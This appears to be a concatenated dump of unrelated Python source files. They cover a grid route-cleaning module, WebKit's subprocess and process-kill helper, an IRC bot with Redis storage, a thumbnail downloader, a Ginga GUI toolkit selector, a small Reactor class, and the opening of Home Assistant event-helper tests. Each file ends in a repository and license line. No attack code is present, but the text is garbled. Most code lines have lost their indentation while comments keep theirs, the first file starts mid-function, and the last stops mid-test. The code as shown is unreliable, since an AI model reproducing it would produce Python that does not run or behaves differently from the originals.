dnew = xd[p] + 1
if (xd[y,x] == -1) or (dnew < xd[y,x]):
                            xd[y,x] = dnew # update the distance
update = True
return xd
def min_route(line_mat, xmat, xd):
    # trace the minimum distances back from the end point to the start point
    xkeep = np.zeros( xd.shape, np.integer )
    # found holds, per line, the smallest distance found so far
    found = np.zeros( line_mat.shape[0]+1, np.integer ) # +1 because line numbers start at 1
for i in range(0, line_mat.shape[0]):
(x0,y0,z0, x1,y1,z1) = line_mat[i]
        xkeep[y1+1,x1+1] = 1 # coordinates are offset by +1
        found[i+1] = xd[y1+1,x1+1] # initial value
update = True
while update:
update = False
        for y in range(1, xd.shape[0]-1): # coordinates are offset by +1
            for x in range(1, xd.shape[1]-1): # coordinates are offset by +1
if xkeep[y,x] == 0: continue
                # we are currently on a kept cell
                # look for the neighbor that continues the shortest route
pmin = None
                xdmin = found[xmat[y,x]] # start from the best distance found so far
for p in ( (y-1,x), (y,x+1), (y,x-1), (y+1,x) ):
if xmat[y,x] != xmat[p]: continue
                    # the neighboring cell holds the same number
if xkeep[p] == 0 and xd[p] < xdmin:
xdmin = xd[p]
pmin = p
if pmin is not None:
xkeep[pmin] = 1
found[xmat[pmin]] = xd[pmin]
update = True
return xkeep
def min_route1(num, line_mat, xmat, xd):
    # trace the minimum distances back from the end point to the start point
    xkeep = np.zeros( xd.shape, np.integer )
    # found holds, per line, the smallest distance found so far
    found = np.zeros( line_mat.shape[0]+1, np.integer ) # +1 because line numbers start at 1
(x0,y0,z0, x1,y1,z1) = line_mat[num-1]
    xkeep[y1+1,x1+1] = 1 # coordinates are offset by +1
    found[num] = xd[y1+1,x1+1] # initial value
update = True
while update:
update = False
        for y in range(1, xd.shape[0]-1): # coordinates are offset by +1
            for x in range(1, xd.shape[1]-1): # coordinates are offset by +1
if xkeep[y,x] == 0: continue
                # we are currently on a kept cell
                # look for the neighbor that continues the shortest route
pmin = None
                xdmin = found[num] # start from the best distance found so far
for p in ( (y-1,x), (y,x+1), (y,x-1), (y+1,x) ):
if not (xmat[p] in (num, 0)): continue
                    # the neighboring cell holds the same number or is empty
if xkeep[p] == 0 and xd[p] != -1 and xd[p] < xdmin:
xdmin = xd[p]
pmin = p
if pmin is not None:
xkeep[pmin] = 1
found[num] = xd[pmin]
update = True
return xkeep
def clean(line_mat, xmat):
"枝分かれしている、冗長部分を削除"
xd = distance(line_mat, xmat)
xkeep = min_route(line_mat, xmat, xd)
xmat2 = xmat * xkeep
return xmat2
def short_cut(line_mat, xmat2):
"迂回している個所を、より短い経路になるように、引き直す"
xmat3 = np.array(xmat2) # コピーする
for num0 in range(0, line_mat.shape[0]):
num = num0 + 1
xd2 = distance1(num, line_mat, xmat3)
xkeep2 = min_route1(num, line_mat, xmat3, xd2)
        # first clear the cells originally occupied by line num,
xmat3[xmat3==num] = 0
        # then redraw line num at the positions marked in xkeep2
xmat3 += xkeep2*(num)
return xmat3
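# Rough usage sketch (variable names are illustrative): xmat is the solution
# grid with a one-cell border (0 = empty cell), and line_mat holds one
# (x0, y0, z0, x1, y1, z1) endpoint row per line.
#   xmat2 = clean(line_mat, xmat)       # strip branches and dead ends
#   xmat3 = short_cut(line_mat, xmat2)  # reroute detours onto shorter paths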
| dasadc/conmgr | server/nlclean.py | Python | bsd-3-clause | 5,834 |
# Copyright (c) 2009, Google Inc. All rights reserved.
# Copyright (c) 2009 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import errno
import logging
import multiprocessing
import os
import StringIO
import signal
import subprocess
import sys
import time
from webkitpy.common.system.outputtee import Tee
from webkitpy.common.system.filesystem import FileSystem
_log = logging.getLogger(__name__)
class ScriptError(Exception):
def __init__(self,
message=None,
script_args=None,
exit_code=None,
output=None,
cwd=None):
if not message:
message = 'Failed to run "%s"' % repr(script_args)
if exit_code:
message += " exit_code: %d" % exit_code
if cwd:
message += " cwd: %s" % cwd
Exception.__init__(self, message)
self.script_args = script_args # 'args' is already used by Exception
self.exit_code = exit_code
self.output = output
self.cwd = cwd
def message_with_output(self, output_limit=500):
if self.output:
if output_limit and len(self.output) > output_limit:
return u"%s\n\nLast %s characters of output:\n%s" % \
(self, output_limit, self.output[-output_limit:])
return u"%s\n\n%s" % (self, self.output)
return unicode(self)
def command_name(self):
command_path = self.script_args
if type(command_path) is list:
command_path = command_path[0]
return os.path.basename(command_path)
class Executive(object):
PIPE = subprocess.PIPE
STDOUT = subprocess.STDOUT
def _should_close_fds(self):
# We need to pass close_fds=True to work around Python bug #2320
# (otherwise we can hang when we kill DumpRenderTree when we are running
# multiple threads). See http://bugs.python.org/issue2320 .
# Note that close_fds isn't supported on Windows, but this bug only
# shows up on Mac and Linux.
return sys.platform not in ('win32', 'cygwin')
def _run_command_with_teed_output(self, args, teed_output, **kwargs):
child_process = self.popen(args,
stdout=self.PIPE,
stderr=self.STDOUT,
close_fds=self._should_close_fds(),
**kwargs)
# Use our own custom wait loop because Popen ignores a tee'd
# stderr/stdout.
# FIXME: This could be improved not to flatten output to stdout.
while True:
output_line = child_process.stdout.readline()
            if output_line == "" and child_process.poll() is not None:
# poll() is not threadsafe and can throw OSError due to:
# http://bugs.python.org/issue1731717
return child_process.poll()
# We assume that the child process wrote to us in utf-8,
# so no re-encoding is necessary before writing here.
teed_output.write(output_line)
# FIXME: Remove this deprecated method and move callers to run_command.
    # FIXME: This method is a hack to allow running commands which both
    # capture their output and print it to stdout.  Useful for things
# like "build-webkit" where we want to display to the user that we're building
# but still have the output to stuff into a log file.
def run_and_throw_if_fail(self, args, quiet=False, decode_output=True, **kwargs):
# Cache the child's output locally so it can be used for error reports.
child_out_file = StringIO.StringIO()
tee_stdout = sys.stdout
if quiet:
dev_null = open(os.devnull, "w") # FIXME: Does this need an encoding?
tee_stdout = dev_null
child_stdout = Tee(child_out_file, tee_stdout)
exit_code = self._run_command_with_teed_output(args, child_stdout, **kwargs)
if quiet:
dev_null.close()
child_output = child_out_file.getvalue()
child_out_file.close()
if decode_output:
child_output = child_output.decode(self._child_process_encoding())
if exit_code:
raise ScriptError(script_args=args,
exit_code=exit_code,
output=child_output)
return child_output
def cpu_count(self):
try:
cpus = int(os.environ.get('NUMBER_OF_PROCESSORS'))
if cpus > 0:
return cpus
except (ValueError, TypeError):
pass
return multiprocessing.cpu_count()
@staticmethod
def interpreter_for_script(script_path, fs=None):
fs = fs or FileSystem()
lines = fs.read_text_file(script_path).splitlines()
if not len(lines):
return None
first_line = lines[0]
if not first_line.startswith('#!'):
return None
if first_line.find('python') > -1:
return sys.executable
if first_line.find('perl') > -1:
return 'perl'
if first_line.find('ruby') > -1:
return 'ruby'
return None
@staticmethod
def shell_command_for_script(script_path, fs=None):
fs = fs or FileSystem()
# Win32 does not support shebang. We need to detect the interpreter ourself.
if sys.platform == 'win32':
interpreter = Executive.interpreter_for_script(script_path, fs)
if interpreter:
return [interpreter, script_path]
return [script_path]
def kill_process(self, pid):
"""Attempts to kill the given pid.
        Will fail silently if pid does not exist or permissions are insufficient."""
if sys.platform == "win32":
# We only use taskkill.exe on windows (not cygwin) because subprocess.pid
# is a CYGWIN pid and taskkill.exe expects a windows pid.
# Thankfully os.kill on CYGWIN handles either pid type.
command = ["taskkill.exe", "/f", "/pid", pid]
# taskkill will exit 128 if the process is not found. We should log.
self.run_command(command, error_handler=self.ignore_error)
return
# According to http://docs.python.org/library/os.html
# os.kill isn't available on Windows. python 2.5.5 os.kill appears
# to work in cygwin, however it occasionally raises EAGAIN.
retries_left = 10 if sys.platform == "cygwin" else 1
while retries_left > 0:
try:
retries_left -= 1
os.kill(pid, signal.SIGKILL)
_ = os.waitpid(pid, os.WNOHANG)
except OSError, e:
if e.errno == errno.EAGAIN:
if retries_left <= 0:
_log.warn("Failed to kill pid %s. Too many EAGAIN errors." % pid)
continue
if e.errno == errno.ESRCH: # The process does not exist.
return
if e.errno == errno.EPIPE: # The process has exited already on cygwin
return
if e.errno == errno.ECHILD:
# Can't wait on a non-child process, but the kill worked.
return
if e.errno == errno.EACCES and sys.platform == 'cygwin':
# Cygwin python sometimes can't kill native processes.
return
raise
def _win32_check_running_pid(self, pid):
# importing ctypes at the top-level seems to cause weird crashes at
# exit under cygwin on apple's win port. Only win32 needs cygwin, so
# we import it here instead. See https://bugs.webkit.org/show_bug.cgi?id=91682
import ctypes
class PROCESSENTRY32(ctypes.Structure):
_fields_ = [("dwSize", ctypes.c_ulong),
("cntUsage", ctypes.c_ulong),
("th32ProcessID", ctypes.c_ulong),
("th32DefaultHeapID", ctypes.POINTER(ctypes.c_ulong)),
("th32ModuleID", ctypes.c_ulong),
("cntThreads", ctypes.c_ulong),
("th32ParentProcessID", ctypes.c_ulong),
("pcPriClassBase", ctypes.c_ulong),
("dwFlags", ctypes.c_ulong),
("szExeFile", ctypes.c_char * 260)]
CreateToolhelp32Snapshot = ctypes.windll.kernel32.CreateToolhelp32Snapshot
Process32First = ctypes.windll.kernel32.Process32First
Process32Next = ctypes.windll.kernel32.Process32Next
CloseHandle = ctypes.windll.kernel32.CloseHandle
TH32CS_SNAPPROCESS = 0x00000002 # win32 magic number
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
pe32 = PROCESSENTRY32()
pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)
result = False
if not Process32First(hProcessSnap, ctypes.byref(pe32)):
_log.debug("Failed getting first process.")
CloseHandle(hProcessSnap)
return result
while True:
if pe32.th32ProcessID == pid:
result = True
break
if not Process32Next(hProcessSnap, ctypes.byref(pe32)):
break
CloseHandle(hProcessSnap)
return result
def check_running_pid(self, pid):
"""Return True if pid is alive, otherwise return False."""
if sys.platform == 'win32':
return self._win32_check_running_pid(pid)
try:
os.kill(pid, 0)
return True
except OSError:
return False
def running_pids(self, process_name_filter=None):
if not process_name_filter:
process_name_filter = lambda process_name: True
running_pids = []
if sys.platform in ("win32", "cygwin"):
# FIXME: running_pids isn't implemented on Windows yet...
return []
ps_process = self.popen(['ps', '-eo', 'pid,comm'], stdout=self.PIPE, stderr=self.PIPE)
stdout, _ = ps_process.communicate()
for line in stdout.splitlines():
try:
# In some cases the line can contain one or more
# leading white-spaces, so strip it before split.
pid, process_name = line.strip().split(' ', 1)
if process_name_filter(process_name):
running_pids.append(int(pid))
except ValueError, e:
pass
return sorted(running_pids)
def wait_newest(self, process_name_filter=None):
if not process_name_filter:
process_name_filter = lambda process_name: True
running_pids = self.running_pids(process_name_filter)
if not running_pids:
return
pid = running_pids[-1]
while self.check_running_pid(pid):
time.sleep(0.25)
def wait_limited(self, pid, limit_in_seconds=None, check_frequency_in_seconds=None):
seconds_left = limit_in_seconds or 10
sleep_length = check_frequency_in_seconds or 1
while seconds_left > 0 and self.check_running_pid(pid):
seconds_left -= sleep_length
time.sleep(sleep_length)
def _windows_image_name(self, process_name):
name, extension = os.path.splitext(process_name)
if not extension:
# taskkill expects processes to end in .exe
# If necessary we could add a flag to disable appending .exe.
process_name = "%s.exe" % name
return process_name
def interrupt(self, pid):
interrupt_signal = signal.SIGINT
# FIXME: The python docs seem to imply that platform == 'win32' may need to use signal.CTRL_C_EVENT
# http://docs.python.org/2/library/signal.html
try:
os.kill(pid, interrupt_signal)
except OSError:
# Silently ignore when the pid doesn't exist.
# It's impossible for callers to avoid race conditions with process shutdown.
pass
def kill_all(self, process_name):
"""Attempts to kill processes matching process_name.
Will fail silently if no process are found."""
if sys.platform in ("win32", "cygwin"):
image_name = self._windows_image_name(process_name)
command = ["taskkill.exe", "/f", "/im", image_name]
# taskkill will exit 128 if the process is not found. We should log.
self.run_command(command, error_handler=self.ignore_error)
return
# FIXME: This is inconsistent that kill_all uses TERM and kill_process
# uses KILL. Windows is always using /f (which seems like -KILL).
# We should pick one mode, or add support for switching between them.
# Note: Mac OS X 10.6 requires -SIGNALNAME before -u USER
command = ["killall", "-TERM", "-u", os.getenv("USER"), process_name]
# killall returns 1 if no process can be found and 2 on command error.
# FIXME: We should pass a custom error_handler to allow only exit_code 1.
# We should log in exit_code == 1
self.run_command(command, error_handler=self.ignore_error)
# Error handlers do not need to be static methods once all callers are
# updated to use an Executive object.
@staticmethod
def default_error_handler(error):
raise error
@staticmethod
def ignore_error(error):
pass
def _compute_stdin(self, input):
"""Returns (stdin, string_to_communicate)"""
# FIXME: We should be returning /dev/null for stdin
# or closing stdin after process creation to prevent
# child processes from getting input from the user.
if not input:
return (None, None)
if hasattr(input, "read"): # Check if the input is a file.
return (input, None) # Assume the file is in the right encoding.
# Popen in Python 2.5 and before does not automatically encode unicode objects.
# http://bugs.python.org/issue5290
# See https://bugs.webkit.org/show_bug.cgi?id=37528
        # for an example of a regression caused by passing a unicode string directly.
# FIXME: We may need to encode differently on different platforms.
if isinstance(input, unicode):
input = input.encode(self._child_process_encoding())
return (self.PIPE, input)
def command_for_printing(self, args):
"""Returns a print-ready string representing command args.
The string should be copy/paste ready for execution in a shell."""
args = self._stringify_args(args)
escaped_args = []
for arg in args:
if isinstance(arg, unicode):
# Escape any non-ascii characters for easy copy/paste
arg = arg.encode("unicode_escape")
# FIXME: Do we need to fix quotes here?
escaped_args.append(arg)
return " ".join(escaped_args)
# FIXME: run_and_throw_if_fail should be merged into this method.
def run_command(self,
args,
cwd=None,
env=None,
input=None,
error_handler=None,
return_exit_code=False,
return_stderr=True,
decode_output=True):
"""Popen wrapper for convenience and to work around python bugs."""
assert(isinstance(args, list) or isinstance(args, tuple))
start_time = time.time()
stdin, string_to_communicate = self._compute_stdin(input)
stderr = self.STDOUT if return_stderr else None
process = self.popen(args,
stdin=stdin,
stdout=self.PIPE,
stderr=stderr,
cwd=cwd,
env=env,
close_fds=self._should_close_fds())
output = process.communicate(string_to_communicate)[0]
# run_command automatically decodes to unicode() unless explicitly told not to.
if decode_output:
output = output.decode(self._child_process_encoding())
# wait() is not threadsafe and can throw OSError due to:
# http://bugs.python.org/issue1731717
exit_code = process.wait()
_log.debug('"%s" took %.2fs' % (self.command_for_printing(args), time.time() - start_time))
if return_exit_code:
return exit_code
if exit_code:
script_error = ScriptError(script_args=args,
exit_code=exit_code,
output=output,
cwd=cwd)
(error_handler or self.default_error_handler)(script_error)
return output
def _child_process_encoding(self):
# Win32 Python 2.x uses CreateProcessA rather than CreateProcessW
# to launch subprocesses, so we have to encode arguments using the
# current code page.
if sys.platform == 'win32' and sys.version < '3':
return 'mbcs'
# All other platforms use UTF-8.
# FIXME: Using UTF-8 on Cygwin will confuse Windows-native commands
# which will expect arguments to be encoded using the current code
# page.
return 'utf-8'
def _should_encode_child_process_arguments(self):
# Cygwin's Python's os.execv doesn't support unicode command
# arguments, and neither does Cygwin's execv itself.
if sys.platform == 'cygwin':
return True
# Win32 Python 2.x uses CreateProcessA rather than CreateProcessW
# to launch subprocesses, so we have to encode arguments using the
# current code page.
if sys.platform == 'win32' and sys.version < '3':
return True
return False
def _encode_argument_if_needed(self, argument):
if not self._should_encode_child_process_arguments():
return argument
return argument.encode(self._child_process_encoding())
def _stringify_args(self, args):
# Popen will throw an exception if args are non-strings (like int())
string_args = map(unicode, args)
# The Windows implementation of Popen cannot handle unicode strings. :(
return map(self._encode_argument_if_needed, string_args)
    # The only required argument to popen is named "args", the rest are optional keyword arguments.
def popen(self, args, **kwargs):
# FIXME: We should always be stringifying the args, but callers who pass shell=True
# expect that the exact bytes passed will get passed to the shell (even if they're wrongly encoded).
# shell=True is wrong for many other reasons, and we should remove this
# hack as soon as we can fix all callers to not use shell=True.
if kwargs.get('shell') == True:
string_args = args
else:
string_args = self._stringify_args(args)
return subprocess.Popen(string_args, **kwargs)
def run_in_parallel(self, command_lines_and_cwds, processes=None):
"""Runs a list of (cmd_line list, cwd string) tuples in parallel and returns a list of (retcode, stdout, stderr) tuples."""
assert len(command_lines_and_cwds)
if sys.platform in ('cygwin', 'win32'):
return map(_run_command_thunk, command_lines_and_cwds)
pool = multiprocessing.Pool(processes=processes)
results = pool.map(_run_command_thunk, command_lines_and_cwds)
pool.close()
pool.join()
return results
def _run_command_thunk(cmd_line_and_cwd):
# Note that this needs to be a bare module (and hence Picklable) method to work with multiprocessing.Pool.
(cmd_line, cwd) = cmd_line_and_cwd
proc = subprocess.Popen(cmd_line, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = proc.communicate()
return (proc.returncode, stdout, stderr)
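# Usage sketch (commands and paths are illustrative):
#   executive = Executive()
#   output = executive.run_command(['ls', '-l'], cwd='/tmp')
#   results = executive.run_in_parallel([(['make'], '/src/a'), (['make'], '/src/b')])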
| 166MMX/openjdk.java.net-openjfx-8u40-rt | modules/web/src/main/native/Tools/Scripts/webkitpy/common/system/executive.py | Python | gpl-2.0 | 21,626 |
#!/usr/bin/python
import os
import sys
import urlparse
import logging
import hashlib
import json
import importlib
import glob
from optparse import OptionParser
import redis
from twisted.words.protocols import irc
from twisted.internet import ssl, reactor, protocol
from werkzeug.routing import Map, DEFAULT_CONVERTERS, BaseConverter, Rule
from werkzeug.exceptions import NotFound, MethodNotAllowed
from converters import *
class Diatribe(irc.IRCClient):
"""docstring for Diatribe"""
nickname = None
channels = {}
plugins = {}
def __init__(self, nickname, config):
self.nickname = nickname
self.plugin_config = config
triggerConverter = self.create_trigger_converter()
my_converters = {'fstring': FinalStringConverter,
'url': URLConverter, 'trigger': triggerConverter}
my_converters.update(DEFAULT_CONVERTERS)
self.rule_map = Map([], converters=my_converters)
self.load_plugins()
self.mapper = self.rule_map.bind(self.nickname, '/',
default_method='chanmsg')
logging.debug('mapper rules: %s' % str(self.mapper.map._rules))
def load_plugins(self):
path = os.path.relpath(os.path.dirname(__file__))
logging.debug('path is %s' % path)
for plugin_src in glob.glob('%s/plugins/*.py' % path):
name = plugin_src.replace('.py', '').replace('/', '.')
if name.find('__') > 0:
continue
logging.debug('Attempting to load plugin at %s' % name)
try:
plugin = importlib.import_module(name)
except ImportError:
logging.error('Unable to load plugin at %s' % plugin_src)
logging.exception("Caught exception loading plugin:")
continue
self.plugins.update({name: {'class': plugin}})
try:
klass = getattr(plugin, plugin.ENTRY_CLASS)
except AttributeError:
logging.error('Unable to load plugin %s, ENTRY_CLASS undefined' % name)
continue
try:
klass(self)
logging.info('successfully loaded plugin %s' % name)
except:
logging.error('Failed to initialize plugin %s' % name)
logging.exception('Caught exception: ')
pass
def create_trigger_converter(self):
my_tc = BaseConverter
my_tc.regex = r"%s|(%s:\s+)" % (self.plugin_config['trigger'],
self.nickname)
return my_tc
def register_command(self, name, command,
endpoint, methods=None, custom_rule=None, query=True):
plugin = self.plugins[name]
if 'commands' in plugin:
plugin['commands'].append(command)
else:
plugin['commands'] = [command]
self.plugins[name] = plugin
rules = []
if len(plugin['commands']) > 1:
rules.append("<any(%s):cmd> " % ', '.join(plugin['commands']))
else:
rules.append(plugin['commands'][0])
if custom_rule:
rules.append(custom_rule)
if query:
rules.append("<fstring:query>")
logging.debug('rules are %s' % rules)
rule_str = "/<trigger:t>" + ' '.join(rules)
rule = Rule(rule_str, endpoint=endpoint, methods=methods)
if rule in self.rule_map._rules:
index = self.rule_map._rules.index(rule)
del self.rule_map._rules[index]
self.rule_map._rules.update()
self.rule_map.add(rule)
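    # Registration sketch (hypothetical plugin): a plugin's entry class would
    # typically call something like
    #   bot.register_command('plugins.echo', 'echo', self.handle_echo)
    # which builds a werkzeug rule of the form "/<trigger:t>echo <fstring:query>".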
def connectionMade(self):
irc.IRCClient.connectionMade(self)
logging.info("connected")
def signedOn(self):
logging.info("signed on to %s" % self.hostname)
if self.factory.network not in self.factory.store.hkeys('networks'):
self.host_id = hashlib.sha1(self.factory.network).hexdigest()[:9]
self.factory.store.hset('networks',
self.factory.network, self.host_id)
logging.debug('set host id in redis')
else:
self.host_id = self.factory.store.hget('networks',
self.factory.network)
logging.debug('got host id from redis')
for channel in self.factory.config['channels']:
self.join(channel.encode('UTF-8'))
def joined(self, channel):
logging.debug('host_id is %s ' % self.host_id)
if channel not in self.channels:
chan_obj = {}
chan_obj['id'] = hashlib.sha1(channel).hexdigest()[:9]
self.channels[channel] = chan_obj
chan_ids = dict([(k, v['id']) for k, v in self.channels.iteritems()])
self.factory.store.hmset('%s.channels' % self.host_id, chan_ids)
logging.debug('set %s.channels to %s' % (self.host_id, chan_ids))
logging.info("joined %s" % channel)
def privmsg(self, nick, channel, msg):
nick = nick.split("!")[0].encode('UTF-8')
channel = channel.decode('UTF-8')
msg = msg.encode('UTF-8')
if channel == self.nickname:
self.dispatch_plugin(nick, nick, msg, method='privmsg')
else:
self.dispatch_plugin(nick, channel, msg)
def dispatch_plugin(self, nick, channel, msg=None, method=None):
logging.debug('dispatching plugin with msg: %s' % msg)
path = "/"+msg.replace(' ', ' ')
logging.debug('path is %s' % path)
try:
endpoint, args = self.mapper.match(path, method)
except (NotFound, MethodNotAllowed):
logging.debug('not calling endpoint')
if method in ['privmsg', 'chanmsg']:
logging.debug("%s: <%s> %s" % (channel, nick, msg))
return False
return False
else:
logging.debug('calling endpoint %s, args %s' % (str(endpoint), args))
endpoint(channel.encode('UTF-8'), nick, msg, args)
class DiatribeFactory(protocol.ClientFactory):
"""docstring for DiatribeFavtory"""
def __init__(self, network, config):
dbn = os.environ.get('REDISCLOUD_URL', config['dbn'])
if not dbn or "redis" not in dbn:
logging.error("Diatribe doesn't support anything except redis right now, please use a redis db")
sys.exit(1)
url = urlparse.urlparse(dbn)
self.store = redis.StrictRedis(host=url.hostname,
port=url.port, password=url.password)
self.network = network
self.config = config['networks'][network]
if 'plugins' in config:
self.plugin_config = config['plugins']
else:
self.plugin_config = None
def buildProtocol(self, addr):
p = Diatribe(self.config['nickname'].encode('UTF-8'),
self.plugin_config)
p.factory = self
return p
def clientConnectionLost(self, connector, reason):
connector.connect()
def clientConnectionFailed(self, connector, reason):
reactor.stop()
def main(config="config.json", debug=False):
if debug:
logging.basicConfig(level=logging.DEBUG)
try:
config = json.load(open(config))
except:
logging.error('unable to parse config')
sys.exit(1)
for network in config['networks']:
net_config = config['networks'][network]
logging.debug('netconfig is %s ' % net_config)
f = DiatribeFactory(network, config)
if net_config['ssl']:
reactor.connectSSL(net_config['network'],
net_config['port'], f,
ssl.ClientContextFactory())
else:
reactor.connectTCP(net_config['network'], net_config['port'], f)
del f
reactor.run()
if __name__ == '__main__':
parser = OptionParser()
parser.add_option('-c', '--config', dest='config', default="config.json")
parser.add_option('-d', '--debug', action="store_true", dest="debug")
opts = parser.parse_args()[0]
for opt, val in opts.__dict__.iteritems():
if not val and opt != "debug":
print "missing option --%s" % opt
sys.exit(1)
main(**opts.__dict__)
| twexler/diatribe | diatribe/bot/__main__.py | Python | gpl-2.0 | 8,361 |
#!/usr/bin/env python
import os
import requests
import json
import sys
from pprint import pprint
url = 'http://api.zonza.tv:8080/v0/'
def raise_invalid():
raise RuntimeError('Credentials not configured. Please set ' \
'env variables BORK_TOKEN and BORK_USERNAME')
auth = {
'Bork-Token': os.environ.get("BORK_TOKEN") or raise_invalid(),
'Bork-Username': os.environ.get("BORK_USERNAME") or raise_invalid(),
}
print 'searching...'
headers = {'content-type': 'application/json'}
headers.update(auth)
with open('/Users/stevenchallis/common-mapped', 'r') as common:
for item in common:
ITEM = item.split(' ', 1)[0]
path = 'http://api.zonza.tv:8080/v0/item/{}/thumbnail/0'.format(ITEM)
print path
response = requests.get(path,
headers=headers)
with open('thumbs/{0}.png'.format(ITEM), 'wb') as f:
f.write(response.content)
| zonza/zonza-api-examples | python/download_thumbnails.py | Python | mit | 955 |
#
# toolkit.py -- module for customizing Ginga GUI toolkit version
#
# Eric Jeschke ([email protected])
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
toolkit = 'choose'
family = None
class ToolKitError(Exception):
pass
def use(name):
"""
Set the name of the GUI toolkit we should use.
"""
global toolkit, family
name = name.lower()
if name.startswith('choose'):
pass
elif name.startswith('qt') or name.startswith('pyside'):
family = 'qt'
if name == 'qt':
name = 'qt4'
assert name in ('qt4', 'pyside'), \
ToolKitError("ToolKit '%s' not supported!" % (name))
elif name.startswith('gtk'):
family = 'gtk'
if name == 'gtk':
name = 'gtk2'
assert name in ('gtk2', ), \
ToolKitError("ToolKit '%s' not supported!" % (name))
elif name.startswith('tk'):
family = 'tk'
assert name in ('tk', ), \
ToolKitError("ToolKit '%s' not supported!" % (name))
else:
ToolKitError("ToolKit '%s' not supported!" % (name))
toolkit = name
def get_toolkit():
return toolkit
def get_family():
return family
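# Typical usage sketch: select the backend before importing any GUI modules,
# e.g.
#   from ginga import toolkit
#   toolkit.use('qt4')   # or 'pyside', 'gtk2', 'tk', 'choose'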
#END
| Rbeaty88/ginga | ginga/toolkit.py | Python | bsd-3-clause | 1,327 |
#/usr/bin/python
#
# Copyright 2013 Luke Hackett
# https://github.com/LukeHackett
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class Reactor(object):
def __init__(self, button, led):
self.button = button
self.led = led
def turn_led_on(self):
self.led.turn_on()
def turn_led_off(self):
self.led.turn_off()
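# Usage sketch (button and led are hypothetical hardware wrappers; led must
# expose turn_on()/turn_off()):
#   reactor = Reactor(button, led)
#   reactor.turn_led_on()
#   reactor.turn_led_off()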
| LukeHackett/python-pi-cookbook | reactor/reactor.py | Python | apache-2.0 | 824 |
"""Test event helpers."""
# pylint: disable=protected-access
import asyncio
from datetime import datetime, timedelta
from unittest.mock import patch
from astral import Astral
import pytest
from homeassistant.core import callback
from homeassistant.setup import async_setup_component
import homeassistant.core as ha
from homeassistant.const import MATCH_ALL
from homeassistant.helpers.event import (
async_call_later,
async_track_point_in_time,
async_track_point_in_utc_time,
async_track_same_state,
async_track_state_change,
async_track_sunrise,
async_track_sunset,
async_track_template,
async_track_time_change,
async_track_time_interval,
async_track_utc_time_change,
)
from homeassistant.helpers.template import Template
from homeassistant.components import sun
import homeassistant.util.dt as dt_util
from tests.common import async_fire_time_changed
DEFAULT_TIME_ZONE = dt_util.DEFAULT_TIME_ZONE
def teardown():
"""Stop everything that was started."""
dt_util.set_default_time_zone(DEFAULT_TIME_ZONE)
def _send_time_changed(hass, now):
"""Send a time changed event."""
hass.bus.async_fire(ha.EVENT_TIME_CHANGED, {ha.ATTR_NOW: now})
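# The tests below drive time-based listeners by firing EVENT_TIME_CHANGED with a
# chosen timestamp instead of waiting for real wall-clock time to pass.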
async def test_track_point_in_time(hass):
"""Test track point in time."""
before_birthday = datetime(1985, 7, 9, 12, 0, 0, tzinfo=dt_util.UTC)
birthday_paulus = datetime(1986, 7, 9, 12, 0, 0, tzinfo=dt_util.UTC)
after_birthday = datetime(1987, 7, 9, 12, 0, 0, tzinfo=dt_util.UTC)
runs = []
async_track_point_in_utc_time(
hass, callback(lambda x: runs.append(1)), birthday_paulus)
_send_time_changed(hass, before_birthday)
await hass.async_block_till_done()
assert len(runs) == 0
_send_time_changed(hass, birthday_paulus)
await hass.async_block_till_done()
assert len(runs) == 1
# A point in time tracker will only fire once, this should do nothing
_send_time_changed(hass, birthday_paulus)
await hass.async_block_till_done()
assert len(runs) == 1
async_track_point_in_utc_time(
hass, callback(lambda x: runs.append(1)), birthday_paulus)
_send_time_changed(hass, after_birthday)
await hass.async_block_till_done()
assert len(runs) == 2
unsub = async_track_point_in_time(
hass, callback(lambda x: runs.append(1)), birthday_paulus)
unsub()
_send_time_changed(hass, after_birthday)
await hass.async_block_till_done()
assert len(runs) == 2
async def test_track_state_change(hass):
"""Test track_state_change."""
# 2 lists to track how often our callbacks get called
specific_runs = []
wildcard_runs = []
wildercard_runs = []
def specific_run_callback(entity_id, old_state, new_state):
specific_runs.append(1)
async_track_state_change(
hass, 'light.Bowl', specific_run_callback, 'on', 'off')
@ha.callback
def wildcard_run_callback(entity_id, old_state, new_state):
wildcard_runs.append((old_state, new_state))
async_track_state_change(hass, 'light.Bowl', wildcard_run_callback)
@asyncio.coroutine
def wildercard_run_callback(entity_id, old_state, new_state):
wildercard_runs.append((old_state, new_state))
